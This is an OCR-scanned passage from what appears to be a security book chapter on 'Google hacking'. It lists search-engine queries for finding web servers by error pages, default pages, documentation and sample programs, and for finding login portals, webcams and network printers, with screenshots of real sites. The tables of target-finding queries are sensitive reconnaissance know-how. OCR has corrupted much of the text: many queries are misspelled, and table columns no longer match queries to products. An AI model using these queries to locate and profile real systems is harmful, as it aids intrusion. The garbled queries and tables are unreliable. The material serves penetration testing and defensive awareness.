use on the server as well as information about the appUcation that caused the error (see Figure 8.9). www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 239 Figure 8.9 ASP Custom Error Messages ' O O O SVUSD Error page M I C I Ohttp://216.239.39.104/sear< - CH' filetypeiasp "Custom Error Messai Custom Error Message Category: Microsoft OLE DB Provider for ODBC Drivers Number: (0x80040E14) Source: Descripton: [MicrosoftlfODBC SQL Server DrivcrlfSQL Serverjlncorrect syntax near tlie keyword 'AND'. Line Number: 364 Additional Info: ServerNaine: www.svusd.org HTTP_Hosi: www.svusd.org Script Patli: /p_subjoct.asp URL: littp://216,239.35,104/scaKii? q=cachc:aQqfaHLBUxOJ:www .svusd .orgyp_subjcct.asp%3Fsld%3D6058+filctypc:a I" Error Submission Form » f ^ Displa'y a menu j Although this ASP message is fairly benign, some ASP error messages are much more revealing. Consider the query "ASPNET_SessionId" "data source=", which locates unique strings found inASP.NET application state dumps, as shown in Figure 8. 10. These dumps reveal aU sorts of information about the running applica- tion and the Web server that hosts that application. An advanced attacker could use encrypted password data and variable information in these stack traces to subvert the security of the application and perhaps the Web server itself. Figure 8.10 ASP Dumps Provide Dangerous Details o o o Settings 1 ' 1 1 <5 1 E|http://64.Z33.16: ~ Q.' "ASP.NET.Sessionld" "data source=" Application Key TVpe ^ppStatTracker OnCoreVZ.AppStatTracker OnCoreVZ.AppStatTracker 1 .astlrtraDayUpcjate System DateTime 9/Z0/Z0D4 7:45:14 AM 1 stylesheet System String S$ + * 3trCorr_CopyFrom System String lourtyName System String Walton County ^ COR QCD,COR WD, COR. WD,D,DEE,DEED^ JasicSearchDocListl System String SiCERT,QCD-EASE,QCD/AFF,QCD/AGREE,q DEED,TD,WD,WD.,WD/AFF,WD/AGREE,WD iasicSearchDocList2 System String COR. RM,COR RM,RM,RM FORM,RM/AFF,Rh iasicSearchDocListS System String CAN,CANC,CANCEL,CAN CELLATION , REL, RE }asicSearchDocList4 System String FOREIGN JUDG,JUDG,JUDG.,JUDG/AFF,JU[ UEN,PUDG,SUM JUDG,TAX UEN,WARR,W> JasicSearchDocListS System String DIS0L,DISOL,DISOL.,DISOLyjUDG,DISSOL, 3asicSearchDocList6 System String WILL,WILL„ ETC. C 3l[jestDate System String 1/1/1976 f A www.syngress.com 240 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware PHP application errors are fairly commonplace. They can reveal aU sorts of information that an attacker can use to profile a server. One very common error can be found with a query such as intext:" Warning: Failed opening" include^ath, as shown in Figure 8.11. Figure 8.11 Many Errors Reveal Pathnames and Filenames O O O http://216.239. 39. 104/search.., 22 ++9g22indude_pathS622&hl=en ^ [ C I |G]http://216.2 " Qr i!nite!ct:"Warnjng: Failed opening" include_path Waminfi: Failed opening 'as_hcadcr.php' for inclusion (include_path =' , : Aj sr/local// sharc/pcar ' ) in /home2/www/supp<»rt/activesquare/as,php on line 366 Warninfi: Failed opening 'as_body.php' for inclusion (indude_path=' ,:^sr,.'locay/sliarc;/pcar') in /home2/www/support/activesquare/as.php on line 406 f 13 CGI programs often reveal information about the Web server and its applica- tions in the form of environment variable dumps. A typical environmental vari- able output page is shown in Figure 8.12. Figure 8.12 CGI Environment Listings Reveal Lots of Information O O O http:/y64.233.161.1t)4/search7q=cac...bot.com+%Z2Server_Software''.&hl=en [ ^ I [ C I Ohttp;//64, 233.1 - Q.- "HTTP_FROM=googlebot" googlebot.com "Server_SoftivaOj B1TP_ACCEPT i text/html, text/plain D1TP_USEIl_ACENT : Cooglebot /2 . 1 ( +http ; //ww. google . com/bot . html ) Gfi.TEWAV_INTEEFACE ! CCI/1.1 BTTP_HOST : ww.uib.no SERVGRSOFTWARE : Apdche / 1 . 3 . 2 6 I Unix] PBP/^.^.I SEHVEE_ADMIN : webiiiaster4tiib.no REMOTE_ADDR : 66.249.64.183 HTTP_IF_HODIFIED_SIHCE ! fue, 31 Aug 2 004 01: 10:34 GHT SCRIPTHAHE ! /ogi-bin/env SERVEE_NAME ! ww .uib.no DOCUMEHT_ROOT i /www HEQUEST_URI : /cgi-bin/env SCHIPT_FILEHAHE ! /local /apache/cgi-bin/env REQUEST_HE1B0D ! GET PATH : /usr/sbin 5 /use /bin HTXP_FROK : googleliot ( at ] google . com SERVER PORT : 80 J? WWW. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 241 This screen shows information about the Web server and the client that con- nected to the page when the data was produced. Since Google's bot crawls pages for us, one way to find these CGI environment pages is to focus on the trail left by the bot, reflected in these pages as the "HTTP_FROM=googlebot" line. We can search for pages like this with a query such as "HTTP_FROM=googlebot" googlehot.com " Server_Sofiu>are" . These pages are dynamically generated, which means that you must look at Google's cache to see the document as it was crawled. To locate good base searches for a particular application, it's best to look at the source code of that application. Using the techniques we've explored so far, it's simple to create these searches. Default Pages Another way to locate specific types of servers or Web software is to search for default Web pages. Most Web software, including the Web server software itself, ships with one or more default or test pages. These pages can make it easy for a site administrator to test the installation of a Web server or application. By pro- viding a simple page to test, the administrator can simply connect to his own Web server with a browser to validate that the Web software was installed cor- rectly. Some operating systems even come with Web server software already installed. In this case, the owner of the machine might not even realize that a Web server is running on his machine. This type of casual behavior on the part of the owner will lead an attacker to rightly assume that the Web software is not well maintained and is, by extension, insecure. By further extension, the attacker can also assume that the entire operating system of the server might be vulner- able by virtue of poor maintenance. In some cases, Google crawls a Web server while it is in its earliest stages of installation, still displaying a set of default pages. In these cases there's generally a short window of time between the moment when Google crawls the site and when the intended content is actually placed on the server. This means that there could be a disparity between what the live page is displaying and what Google's cache displays. This makes little difference from a Google hacker's perspective, since even the past existence of a default page is enough for profiling purposes. Remember, we're essentially searching Google's cached version of a page when we submit a query. Regardless of the reason a server has default pages installed, there's an attacker somewhere who will eventually show interest in a machine displaying default pages found with a Google search. www. syngress.com 242 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware A classic example of a default page is the Apache Web server default page, shown in Figure 8.13. Figure 8.13 A Typical Apache Default Web Page ^ Q ^ Test Page for Apache Instaffation on Web Site^ [ »■ I fe^ |C|http://216.239.39.104ysearcti?q=cache:¥i4alzX6SzK -^Cl- initle:T"^ It Worked! The Apache Web Server is Installed on this Web Site! If you can see this page, then the people who own this domain have Just installed the Apache Web server softwarc successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their teal content. If you are seeing this page instead of the site you expected, please contact tht administrator olthe site involved. (Try sending mail to ojcbmastor 8 doi!)sin> .) Although this sitc is running the Apache software it almost certainly has no other coruiection to the Apache Group, so please do not send mail about this sitc or its contents to the A pache authors . If you do , your message w m be ignored . ^ Display a menu Notice that the administrator's e-mail is generic as well, indicating that not a lot of attention was paid to detail during the installation of this server. These default pages do not list the version number of the server, which is a required piece of information for a successful attack. It is possible, however, that an attacker could search for specific variations in these default pages to find specific ranges of server versions. As shown in Figure 8.14, an Apache server running ver- sions 1.3.11 through 1.3.26 shows a slightly different page than the Apache server version 1.3.11 through 1.3.26, shown in Figure 8.13. www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 243 Figure 8.14 Subtle Differences in Apache Default Pages O O Test Page far Apache installation iT^^^^ ["c^l |G|htrfi7/64.233.161,104, " Or intitleTest-Page, for, Apache 5eeiiig.thi5, instead -J If you can sec this, il means that the installation of the Auache web server soft\^'aic on this system was successful. You may now add content to this directory and replace this page. Hello Sharon trom the new Apache Seeing this instead of tlie website you expected? This page is here because the site administrator has changed the configuration of this web server. Please contact the person responsible for maintaining this server with questions. The Apache Software Foundation, which wrote Ihc web server software this site administrator Is using, has nothing to do will: maintaining litis site and cannot help itsolvc configuration The Apache documentation has been included with this distribution. You are free to use the image below on an Apache-powered web server. Thanks for using Apache! iwercd by Using these subtle differences to our advantage, we can use specific Google queries to locate servers with these default pages, indicating that they are most likely running a specific version of Apache. Table 8.4 shows queries that can be used to locate specific families of Apache running default pages. Table 8.4 Queries That Locate Default Apache Installations Apache Server Version Query Apache 1.2.6 Apache 1.3.0-1.3.9 Apache 1.3.11-1.3.31 Apache 2.0 Apache SSL/TLS Apache on Red Hat Apache on Fedora untitle -."Test Page for Apache Installation" "You are free" intitle:"Test Page for Apache" "It worked!" "this Web site!" intitle : Test. Page. for. Apache seeing, this, instead intitle : Simple. page, for Apache Apache. Hook. Functions intitle -.test.page "Hey, it worked .'" "SSL/TLS- aware" "Test Page for the Apache Web Server on Red Hat Linux" intitle: "test page for the apache http server on fedora core" Continued WWW. syngress.com 244 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.4 Queries That Locate Default Apache Installations Apache Server Version Query Apache on Debian intitle: "Welcome to Your New Home Page!' debian Apache on other Linux intitle: "Test Page Apache Web Server on red. hat - fedora IIS also displays a default Web page when first installed. A query such as intitle: "Welcome to IIS 4.0" can locate very specific versions of IIS, as shown in Figure 8.15. Figure 8.1 5 Locating Default Installations of IIS 4.0 on Windows NT 4.0/QP Welcome To IIS 4.01 I ^ ] ] e f |C|hltp://Z16.Z39,41,104/searc - C^- mtitle:"Welcome to IIS 4,0" Welcome to Microsoft® Windows NT® 4.0 Option Pack Microsoft- iws NT 4.0 Option Pacl^ Microsoft Windov^s NT 4.0 Option Pack provides enhanced Web, application, and communication services for Windows NT Server 4.0- So if you're setting up a simple Web site on your corporate intranet, creating large sites for the Internet, or developing component-based applications, the Windows NT 4.0 Option Pack provides a simple, flexible way to make your eKisting Windows NT Server 4.0 an even stronger Web and applications platform. We welcome your feedback! It's important that we incorporate your feedback into our software. Please send any comments or suggestions to iiswishigimicrosoft.coni. I I Table 8.5 Queries That Locate Specific IIS Server Versions IIS Server Version Query Many intitle: "welcome to" intitle: internet IIS Unknown intitle: "Under construction" "does not currently have" IIS 4.0 intitle: "welcome to IIS 4.0" IIS 4.0 allintitle: Welcome to Windows NT 4.0 Option Pack IIS 4.0 allintitle: Welcome to Internet Information Server IIS 5.0 allintitle :Welcome to Windows 2000 Internet Services IIS 6.0 allintitle .Welcome to Windows XP Server Internet Services www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 245 Although each version of IIS displays distinct default Web pages, in some cases service packs or hotfixes could alter the content of a default page. In these cases, the subtle page changes can be incorporated into the search to find not only the operating system version and Web server version but also the service pack level and security patch level. This information is invaluable to an attacker bent on hacking not only the Web server, but hacking beyond the Web server and into the operating system itself. In most cases, an attacker with control of the operating system can wreak more havoc on a machine than a hacker who con- trols only the Web server. Netscape servers can also be located with simple queries such as alUntitle: Netscape Enterprise Server Home Page, as shown in Figure 8.16. Figure 8.16 Locating Netscape Web Servers O f3 O Netscape Enterprise Server Home Page y ■< - |C|linp://64. 233.161. ~ Q.- alliniitleiMeiscape Enterprise Server Home Page age OH^ Netscape'Enterprise Server 3.0 ' An enterprise .strength web and applicatioji server foi the intranet and extranet th^t >c:oEne<:ts eniplo}'e£s, customers, and partners to an or^anizatjon's infomiatjon and web-based applications. It provides powerfu] informatiiin-nianagenient and data.a'C!{!ess services that integrals %vith eii idling sysif ms and resources. Sophisticated SE.iUtc:H Search capabilities let usen search tlic Jfy^J text content and the file propeities of any document on the server. This, pravides great flexibility and precision. For exaniple^aTisercan find all docTinientSi created within the last month that include the word r^c venue. Netscape Enterprise Server automatically handler content in vaiious formats, including HTML, Microsoft Woid, Adobe PDFn .and many others. and orgar Netscate Web Fltlisher Web content authors can easily manage their fileson aNetscape Enterprise Server by using the Ne^tscape Web Publisher to publish ! documents and directories. As lie moved, lien Hined, and updated, the server auto ntatically maintains and updates the links. Dociuiientcontro] and versioning preserve document integrity in collaborative editing environments. Access Ct>NTHOL Using Access Ccntn^l, authors specif who can edit and view documents, enabling woiigroups to manage and share critical information. Both Iministratois and web content providers can eate flexible, Internet 'teady access controls. Intelligent Akents • Agents on Netscape Enterprise Server impicve an organization's communication and efficiency by providing timely change notification and information to a usei^s attention. Both users and administrators (with valid user accounts) can create agents that run on the server and intetsct with the server'scontcnt. E Display a Other Netscape servers can be found with simple allintitle searches, as shown in Table 8.6. Table 8.6 Queries That Locate Netscape Servers Netscape Server Type Query Enterprise Server FastTrack Server allintitle: Netscape Enterprise Server Home Page allintitle: Netscape FastTrack Server Home Page www.syngress.com 246 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Many different types of Web server can be located by querying for default pages as well. Table 8.7 lists a sample of more esoteric Web servers that can be profiled with this technique. Table 8.7 Queries That Locate More Esoteric Servers Server/Version Query Cisco Micro Webserver 200 Generic Appliance HP appliance sal iPlanet/Many Intel Netstructure JWS/1 .0.3-2.0 J2EE/Many Jigsaw/2.2.3 Jigsaw/Many KFSensor honeypot Kwiki Matrix Appliance NetWare 6 Resin/Many Resin/Enterprise Sambar Server Sun AnswerBook Server TivoConnect Server "micro webserver home page" "default web page" congratulations "hosting appliance" intitle: "default domain page" "congratulations' "hp web" intitle: "web server, enterprise edition" "congratulations on choosing" Intel netstructure allintitle: default home page Java web server intitle: "default j2ee home page" intitle: "jigsaw overview" "this is your" intitle:"jigsaw overview" "KF Web Server Home Page" "Congratulations! You've created a new Kwiki website. " "Welcome to your domain web page" matrix intitle: "welcome to netware 6" allintitle: Resin Default Home Page allintitle: Resin-Enterprise Default Home Page intitle: "sambar server" "1997. .2004 Sambar" inurl: "Answerbook2options" inurh/TiVoConnect Default Documentation Web server software often ships with manuals and documentation that ends up in the Web directories. An attacker could use this documentation to either profile or locate Web software. For example, Apache Web servers ship with documenta- tion in HTML format, as shown in Figure 8.17. www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 247 Figure 8.17 Apache Documentation Used for Profiling a B B Apache HTTP Ser n 2.0 □ HTTP Server =■ Documentation > Version 2.D Apache HTTP Server Version 2.0 Documentation New Featurea in Version 2.0 Upgrading to Vsrsion 2.U ApachB License Rflfarsnce Manual Compilirc; and Ins.lallina Staiinq Stopping or Restarting Run-tinna Configuration Diractives DIractive Quick-RBTBranf^ Modules MulthProcesaInq Modulaa fMPMsl Filters Handlers Sarverana Supporting Programs ConficiLiralion Fltes liguralion Sections Con lent negotiation Dynamic Shared ObjectB (DSO) How-To / Tutorials Authentloatlon. Authorization, and Environment Variables Log Files Mapping URLs to the Filesystem Pfirforn AcoBsa Control CGI: Dynamic Content .■-i-accGSE; files Server Side Includes iSSli tJserweb directories Server-Wide Gonllguration SSL/TLS Ehorvption Suexao Exeoulion tor CGl URL Rewriting GuldB Virtual HosIs Platform Specific Notes Micro soft Windows Movell NetWare EBCDIC Port OttisrToplce FrequBhtlv Asked Questions SIteMap Tutorials Documantatlon Tor Developers Otner Notes Maintained by the Apache HTTP Server Doai I Directives | FAQ | Glo; In most cases, default documentation does not as accurately portray the server version as well as error messages or default pages, but this information can cer- tainly be used to locate targets and to gain an understanding of the potential security posture of the server. If the server administrator has forgotten to delete the default documentation, an attacker has every reason to believe that other details such as security have been overlooked as well. Other Web servers, such as IIS, ship with default documentation as well, as shown in Figure 8.18. Figure 8.18 IIS Server Profiled Via Default Manuals O O O Microsoft Internet Information S-ervices 5.0 Docuf 1""^ I I C 1 ^'^hitpv/mvw.nerfcor " 0;- mufl:iishelo core IIS 5.0 Documentation Mscrosoft" internet Information Ser Getting Started Internet Inrormation Services S.O {IIS} Is the WIrttlows 2000 Wet) sewice that nnaKe easy ta publish inrormation m yeur Intranet or or* the Irsternet, Release Wotes t Ir^cludes the latest niFormatlon for ensuring proDer iristall and use of Internet Information Servl * Using the Documentation s hilghllgrits the tools in this documentation that will help vau find the information you need, * Glossarv s Oeflrtes common Interne www.syngress.com 248 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware In most cases, specialized programs such as CGI scanners or Web application assessment tools are better suited for finding these default pages and programs, but if Google has crawled the pages (from a link on a default main page for example), you'll be able to locate these pages with Google queries. Some queries that can be used to locate default documentation are listed in Table 8.8. Table 8.8 Queries That Locate Default Documentation Search Subject Query Apache 1 .3 intitle: "Apache 1.3 documentation" Apache 2.0 intitle: "Apache 2.0 documentation" Apache Various intitle: "Apache HTTP Server" intitle:" documentation" ColdFusion inurhcfdocs EAServer intitle :"Easerver" "Easerver Version Documents iPlanet Server 4.1/ inurl: "1 manual! servletsl" intitle: "programmer" Enterprise Server 4.0 IIS/Various inurhiishelp core Lotus Domino 6 intext:/help/help6_client.nsf Novell Groupwise 6 inurl :/com/novell/gwmonitor Novell Groupwise inurl: "Icomlnovelllwebaccess" WebAccess Novell Groupwise inurl: "Icomlnovelllwebpublisher" WebPublisher Sample Programs In addition to documentation and manuals that ship with Web software, it is fairly common for default appUcations to be included with a software package. These default applications, like default Web pages, help demonstrate the func- tionality of the software and serve as a starting point for developers, providing sample routines and code that could be used as learning tools. Unfortunately, these sample programs can be used to not only profile a Web server; often these sample programs contain flaws or functionaUty an attacker could use to compro- mise the server. The Microsoft Index Server simple content query page, shown in Figure 8.19, allows Web visitors to search through the content of a Web site. In www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 249 some cases, this query page could locate pages that are not linked from any other page or that contain sensitive information. Figure 8.19 Microsoft Index Server Simple Content Query Page i:0 O O Index Server Search Form tt -4 ^ ] [ C ] |G|littp://216.239,41.104;sear<:h " Or inurl:samples/Searcli/quaryliitj Index Server Simple Content Query Enter your query below : f Exgcjte Query ) f Cle Tipa for searching Other query pages: File size property query File modification time Dfopertv Query File autfior propcftv Qucrv As with default pages, specialized programs designed to crawl a Web site in search of these default programs are much better suited for finding these pages. However, if a default page provided with a Web server contains links to demon- stration pages and programs, Google will find them. In some cases, the cache of these pages will remain even after the main page has been updated and the links removed. Table 8.9 shows some queries that can be used to locate default- installed programs. www. syngress.com 250 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.9 Queries That Locate Default Programs Software Apache Cocoon Generic Generic IBM Websphere Lotus Domino 4.6 Lotus Domino 4.6 Lotus Domino 4.6 Lotus Domino 4.6 Lotus Domino 4.6 Microsoft Index Server Microsoft Site Server Novell NetWare 5 Novell GroupWise WebPublisher Netware WebSphere OpenVMS! Oracle Demos Oracle JSP Demos Oracle JSP Scripts Oracle 9i IIS/Various IIS/Various Sambar Server Query inurl :cocoon/samples/welcome inurhdemo \ inurhdemos inurl: sample \ inurl -.samples inurl: WebSphereSamples inurl: /sample/framew46 inurl :/sample/faqw46 inurl :/sample/pagesw46 inurl :/sample/siregw46 inurl :/sample/faqw46 inurl :samples/Search/queryhit inurl :siteserverl docs inuri.llcgilsewse. nim in uri.lservletl webpub gro up wise inurl :/servlet/SessionServlet inurl :sys$common inurl :/demo/sql/index.jsp in uri: dem ol basic! in fo inurl :ojspdemos inurl :/pls/simpledad/admin_ inurl :iissamples inurl: /scripts/samples/search intitle: "Sambar Server Samples" Locating Login Portals The term login portal describes a Web page that serves as a "front door" to a Web site. Login portals are designed to allow access to specific features or functions after a user logs in. Google hackers search for login portals as a way to profile the www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 251 software that's in use on a target and to locate links and documentation that might provide useful information for an attack. In addition, if an attacker has an exploit for a particular piece of software, and that software provides a login portal, the attacker can use Google queries to locate potential targets. Some login portals, like the one shown in Figure 8.20, captured with alUnurl: "exchange /logon. asp", are obviously default pages provided by the software manufacturer — in this case, Microsoft. Just as an attacker can get an idea of the potential security of a target by simply looking for default pages, a default login portal can indicate that the technical skill of the server's administrators is gener- ally low, revealing that the security of the site will most likely be poor as well. To make matters worse, default login portals like the one shown in Figure 8.20 indi- cate the software revision of the program — in this case, version 5.5 SP4.An attacker can use this information to search for known vulnerabilities in that soft- ware version. Figure 8.20 Outlook Web Access Default Portal ^0 e ' Or Google Web Access for Microsoft (R) Exchange Server Version 5 J SP4 Microsoft (R) Outlook (TM) Web Access is q MicicM^ft E^ccbange Active Server Application that givei you private access to your Micro soft Outlook or Microsoft Exchange pcisonaJ e-mail account so that you can view yourlnbox from any Web Browser. It also allows you to view Exchange serverpublic folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search forusers in the Address Book. For more information about this Outlook product. click here. Log On Exchange Users Only: Type your alias and ther click hen your personal e-mail accourst. Public Access Clickbere to: browse Public Folders, find names in the Address Book, and post messages anonymously. By following links from the login portal, an attacker can often gain access to other information about the target. The Outlook Web Access portal is particu- larly renowned for this type of information leak because it provides an anony- mous public access area that can be viewed without logging in to the mail system. This public access area sometimes provides access to a public directory or to broadcast e-mails that can be used to gather usernames or information, as shown in Figure 8.21. www. syngress.com 252 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Figure 8.21 Public Access Areas Can Be Found from Login Portals O O Read Message ^ X 1 ♦ ♦ ? ^Close) T] From: Roger • Posted To: HQ Emergency Announcen^nt Conversation: Early Diimaiial - 12/5/02 Keywords: Subject: Eai'ly Disma^sal - 12/5/02 Posted: 12/5/02 1 1:15 AM ImportaiKe: Nomia] Due to the extreme weather condtions, the I^esident's Otfice has granted permission for all Headquarters personnel to leave today at 3:30 PM. Please drive carefully .......^oger A. Some login portals provide more details than others. As shown in Figure 8.22, the Novell Management Portal provides a great deal of information about the server, including server software version and revision, application software version and revision, software upgrade date, and server uptime. This type of infor- mation is very handy for an attacker staging an attack against the server. Figure 8.22 Novell Management Portal Reveals a Great Deal of Information 6 O 6 http://64.233.161.104/sear... d.edy;800fi/TOP.HTML&hNen ^ ] [ d ] C http://64.2 3 " Qr intext:"netware management portal versio ! 1 1 — - ...-ijj ...... ...... r ..— . — - - - - r - - - . — — 1 Gcc^Jf j'.T )K>! affiiiased h'j'rft Ifis ujfj'fer.T of Shis page nor respensibk for ilx cc>ntenL [V E 1 p U T Novel] NetWare S .1 fvj gtVVa PS ^^^'^^^'I'M. Server Version 5 >30 revisioiiK. mx ± ^ De^mber 9,2003 Management NetWare Manag^nient Portal P 0 fta 1 1^ Version 1.10 revision D,Decemlier ^ Server Up Time: 28:05:42:09 1 ^ V T 1 1® 1 1 % A. ■ W Display a menu www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 253 Table 8.9 shows some queries that can be used to locate various login portals. Refer to Chapter 4 for more information about login portals and the informa- tion they reveal. Table 8.9 Queries That Locate Login Portals Login Portal 4lmages GMS Apache Tomcat Admin ASP.NET Citrix Metaframe Citrix Metaframe ColdFusion Admin ColdFusion Generic Compaq Insight Manager CuteNews Easy File Sharing Emule Ensim Enterprise Generic Admin Generic User Generic GradeSpeed Infopop UBB Jetbox CMS Lotus Domino Admin Lotus Domino Mambo CMS Admin Microsoft Certificate Server Microsoft Outlook Web Access Query "4images Administration Control Panel" intitle: "Tomcat Server Administration" inurl.ASPIogin aspx inurlilCitrix/Nfuse 1 71 in uri: citrix/ meta fram exp/defa ult/login.asp intitle: "ColdFusion Administrator Login" inuri.login.cfm inurhcpqiogin. htm "powered by CuteNews . © CutePHP intitle: "Login - powered by Easy File Sharing Web "Web Control Panel" "Enter your password here" intitle: "Welcome Site/User Administrator" "Please inurh/admin/login.asp inurhlogin.asp "please log in" inurl:"gs/adminlogin.aspx" inurl:cgi-bin/ultimatebb.cgi?ubb= login Login ("Powered by Jetbox One CMS ™ " | "Powered by Jetstream © ") inurl: "webadmin" filetype:nsf inurl: names. nsf?opendatabase inurhadministrator "welcome to mambo" intitle: "microsoft certificate services" inuri.certsrv allinurl: "exchange/logon. asp" Continued www. syngress.com Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.9 Queries That Locate Login Portals Login Portal Query Microsoft Qutlool< Web Access Microsoft Remote Deslerti&s Tech Support Home Select from the menu above to modify server corifigufation. SERVER CONFIGURATION: Scn'crNamc: MSS_612591 Boot Code Version: V 1 .6 (Sep 01 , 2000) Firmware Version: Version V 3. 6/8 (01 0807) Uptime: 16 Days 23:55 Hariw arc Address: 0O-8O-a3-61 -25-91 IP Address: 192,168.1.200 Subnet Mask: 255.255.255.0 PORT: 1 Connected PROTOCOLS: TCP/IP IPX LAT Enabled Disabled Enabled I www. syngress.com 256 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware All types of devices can be connected to a network. In Chapter 5, we dis- cussed network devices that reveal a great deal of information about the network they are attached to. These devices, ranging from switches and routers to printers and even firewalls, are considered great finds for any attacker interested in net- work reconnaissance, but some devices such as Webcams are interesting finds for an attacker as well. In most cases, a network-connected Webcam is not considered a security threat but more a source of entertainment for any Web surfer. Keep a few things in mind, however. First, some companies consider it trendy and cool to provide customers a look around their workplace. Netscape was known for this back in its heyday. The Webcams located on these companies' premises were obviously authorized by upper management. A look inside a facility can be a huge benefit if your job boils down to a physical assessment. Second, it's not all that uncommon for a Webcam to be placed outside a facility, as shown in Figure 8.24. This type of cam is a boon for a physical assessment. Also, don't forget that what an employee does at work doesn't necessarily reflect what he does on his own time. If you locate an employee's per- sonal Web space, there's a fair chance that these types of devices will exist. Figure 8.24 Webcams Placed Outside a Facility powered by webcamXP PRO vl.07.C55B I Dfspiay a menii www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 257 Most network printers manufactured these days have some sort of Web-based interface installed. If these devices (or even the documentation or drivers sup- plied with these devices) are linked from a Web page, various Google queries can be used to locate them. Once located, network printers can provide an attacker with a wealth of information. As shown in Figure 8.25, it is very common for a network printer to list details about the surrounding network, naming conventions, and more. Many devices located through a Google search are stiU running a default, inse- cure configuration with no username or password needed to control the device. In a worst-case scenario, attackers can view print jobs and even coerce these printers to store fdes or even send network commands. Figure 8.25 Networked Printers Provide Lots of Details IE ei X CentreWare Internet Services XEROX Phaser 4500 ~^ Jobs Prlm~ ^ Phaser 450D jj| About Printer + _| General Q>| E -Supplies Mail Alerts : Interfaces [+1 CD Protocols H Q Emulations El O Web Server El O Security '{^ Clone Printer About Printer Version InformatiD Printer Mo-del Phaser450DN Printer Serial Number PMT231613 Machine Ad-draas COLOOLaa'ec'cd:60 Operating System 4.4C PDL CI. 16 Networliing 19.64.1 ;.1 3 Engine 3.04.0 Memory RAM Size 64 MB 3 1011 Empty Slots 64 MB Page Description Languages Page Description Languages Yes PostScrlDtVer&lon 3015,102 (5) PCL Installed Yss Options Instalied Hard Drive Inslalled No Tray 3 No Tray 4 No Fonts Installed 39 Duplex Unit Yes S.tacker No 'V RIGHT SSOOi KEFKW COflPOflATION, Al I^hteFli Table 8.10 shows queries that can be used to locate various network devices. Refer back to Chapter 5 for more conventional network devices such as routers, switches, proxy servers, and firewalls. www.syngress.com 258 Chapter 8 • Tracking Down Web Servers, Login Portals, and Networl< Hardware Table 8.10 Queries That Locate Various Networl< Devices Device Query Axis Video Server (CAM) inurhindexFrame.shtml Axis AXIS Video Live Camera intitle:"Live View / - AXIS" AXIS Video Live View intitle:"Live View / - AXIS" \ inurl: view/view.sht AXIS 200 Network Camera intitle:"The AXIS 200 Home Page" Canon Network Camera intitle : liveapplet inurl: LvAppI Mobotix Network Camera intext: "MOBOTIX Ml " intext: "Open Menu" Panasonic Network Camera intitle: "WJ-NT1 04 Main Page" Panasonic Network Camera inurl: "ViewerFrame?Mode = " Sony Network Camera SNC-RZ30 HOME Seyeon FlexWATCH Camera intitle :flexwatch intext: "Home page ver" Sony Network Camera intitle:snc-z20 inurhhome/ webcamXP "powered by webcamXP" "Pro \ Broadcast" Canon ImageReady intitle: "remote ui:top page" Fiery Printer Interface ("Fiery WebTools" inurl:index2.html) \ "WebTools enable observe, , flow print jobs" Konica Printers intitle: "network administration" inurl:" nic" RICOH Copier inurl :sts_index. cgi RICOH Printers intitle: RICOH intitle: "Network Administration" Tektronix Phaser Printer intitle: "View and Configure PhaserLink" ft"/ ■ III fr\ C't'^'t'i ic rftrv^ 1 IllUfl. lIVKZ blolUb.liUlll Xerox Phaser 6250 Printer Phaser 6250 Printer Neighborhood "XEROX CORPORATION" Xerox Phaser 740 Printer "Phaser® 740 Color Printer" "printer named: " phaserlink Xerox Phaser 8200 Printer "Phaser 8200" "© Xerox" "refresh" " Email Alerts" Xerox Phaser 840 Printer Phaser® 840 Color Printer Xerox Centreware Printers intext: centreware inurl: status XEROX WorkCentre intitle: "XEROX WorkCentre PRO - Index" www. syngress.com Tracking Down Web Servers, Login Portals, and Network Hardware • Chapter 8 Summary Attackers use Google for a variety of reasons. An attacker might have access to an exploit for a particular version of Web software and may be on the prowl for vulnerable targets. Other times the attacker might have decided on a target and is using Google to locate information about other devices on the network. In some cases, an attacker could simply be looking for Web devices that are poorly con- figured with default pages and programs, indicating that the security around the device is soft. Directory Hstings provide information about the software versions in use on a device. Server and appHcation error messages can provide a wealth of information to an attacker and are perhaps the most underestimated of all information-gath- ering techniques. Default pages, programs, and documentation not only can be used to profile a target, but they serve as an indicator that the server is somewhat neglected and perhaps vulnerable to exploitation. Login portals, while serving as the "front door" of a Web server for regular users, can be used to profile a target, used to locate more information about services and procedures in use, and as a virtual magnet for attackers armed with matching exploits. In some cases, login portals are set up by administrators to allow remote access to a server or net- work. This type of login portal, if compromised, can provide an entry point for an intruder as well. Whatever motivates an attacker, it's best to understand the techniques he or she could employ so that you protect yourself and your customers from this type of threat. Solutions Fast Track Locating and Profiling Web Servers 0 Directory listings and default server-generated error messages can provide details about the server. Even though this information could be obtained by connecting directly to the server, an attacker armed with an exploit for a particular version of software could find a target using a Google query designed to locate this information. 0 Server and appHcation error message proved a great deal of information, ranging from software versions and patch level to snippets of source code and information about system processes and programs. Error www. syngress.com Chapter 8 • Tracking Down Web Servers, Login Portals, and Network Hardware messages are one of the most underestimated forms of information leakage. 0 Default pages, documentation, and programs speak volumes about the server that hosts them. They suggest that a server is not well maintained and is by extension vulnerable due to poor maintenance. Locating Login Portals 0 Login portals can draw attackers who are searching for specific types of software. In addition, they can serve as a starting point for information- gathering attacks, since most login portals are designed to be user friendly, providing links to help documents and procedures to aid new users. Administrative login portals and remote administration tools are sometimes even more dangerous, especially if 